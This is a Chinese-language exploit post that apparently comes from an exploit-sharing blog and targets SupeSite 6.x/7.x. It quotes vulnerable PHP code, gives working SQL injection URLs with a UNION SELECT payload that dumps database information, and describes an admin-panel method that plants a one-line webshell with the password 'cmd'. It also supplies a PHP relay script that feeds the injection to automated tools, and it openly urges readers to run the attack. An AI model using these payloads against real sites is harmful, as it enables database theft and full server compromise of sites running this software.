SupeSite 通杀注射以及后台getshell

试了6.x 7.x 其他版本没测试, 大家自己测试下吧 [php] batch.common.php (218) : } elseif ($action == 'modelquote') { //模型评论引用 $name = empty($_GET['name'])?'':trim($_GET['name']); //无过滤 $cid = empty($_GET['cid'])?0:intval($_GET['cid']); $html = false; if(!empty($name) && !empty($cid)) { $item = array(); $query = $_SGLOBAL['db']->query('SELECT * FROM '.tname($name.'comments').' WHERE cid=\''.$cid.'\''); //tname处理 然后带入 if($item = $_SGLOBAL['db']->fetch_array($query)) { $item['message'] = preg_replace("//is", '',$item['message']); $html = '[quote]'.$blang['from_the_original_note'].$item['author'].$blang['at'].sgmdate($item['dateline']).$blang['released']."\n".cuthtml($item['message'], 100).'[/quote]'; showxml($html); } } showxml($html); } [/php] 我们再看看tname函数 [php] function/common.func.php (601) : function tname($name, $mode=0) { global $_SC; if($mode == 1) { return (empty($_SC['dbname_bbs'])?'':'`'.$_SC['dbname_bbs'].'`.').'`'.$_SC['tablepre_bbs'].$name.'`'; } elseif ($mode == 2) { return (empty($_SC['dbname_uch'])?'':'`'.$_SC['dbname_uch'].'`.').'`'.$_SC['tablepre_uch'].$name.'`'; } else { return $_SC['tablepre'].$name; } }[/php] 依然没过滤, 他都不管了你了 你还不注入吗? exp: http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments [sql] # 这个后面可以直接order by了 你懂的 http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments order by xxx # 由于版本不同, 所以字段数不一样, 建议先orderby判断下来, 比如7.5的, 就是21个字段, 直接丢个7.5的exp吧 http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,user(),0x7e,0x5430304C5320474F21,0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 也可以配置好了,直接丢注入攻击跑 http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2 关于SupeSite 7.5后台GETSHELL 新的拿shell方法, 和uchome的如出一辙 http://www.xxx.com/admincp.php?action=usrblocks&blocktype=&op=addblockcode [php] [/php] 调用:http://www.xxx.com/batch.javascript.php?bid=1650 ,即在data下生成一句话木马a.php,密码为cmd 附上一个中转的脚本
<?php
set_time_limit(0); 
$id=$_GET["id"]; 
$id=str_replace(" ","%20",$id); 
$id=str_replace("=","%3D",$id); 

$url = "http://blog.0day5.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=$id%23"; //更改为你需要提交的地址

echo $url;

$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, "$url"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);

$output = curl_exec($ch); 
curl_close($ch); 
print_r($output);
?>
直接拿着工具就可以跑了

发表评论